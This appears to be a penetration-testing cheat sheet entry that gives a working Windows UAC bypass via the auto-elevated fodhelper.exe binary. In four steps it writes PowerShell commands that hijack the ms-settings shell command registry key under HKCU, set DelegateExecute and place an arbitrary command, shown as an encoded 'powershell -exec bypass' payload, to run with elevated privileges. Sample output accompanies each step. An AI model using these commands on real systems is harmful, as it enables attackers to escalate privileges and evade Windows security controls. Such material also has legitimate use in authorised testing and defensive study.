Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Leveraging Auto-elevated Windows Binaries
1. Create Registry Key for Command Execution
New-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
Sample Output:
PS C:\Users\rainbow\Desktop> New-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
Hive: HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open
Name Property
---- --------
command
2. Set DelegateExecute Property to Enable Command
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Sample Output:
PS C:\Users\rainbow\Desktop> New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
DelegateExecute :
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open
PSChildName : command
PSDrive : HKCU
PSProvider : Microsoft.PowerShell.Core\Registry
3. Configure Command to Execute with Elevated Privileges
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "<CMD>" -Force
Sample Output:
PS C:\Users\rainbow\Desktop> Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "powershell -exec bypass -e ---[SNIP]---" -Force
4. Execute Fodhelper to Trigger UAC Bypass
C:\Windows\System32\fodhelper.exe
Sample Output:
C:\Windows\System32\fodhelper.exe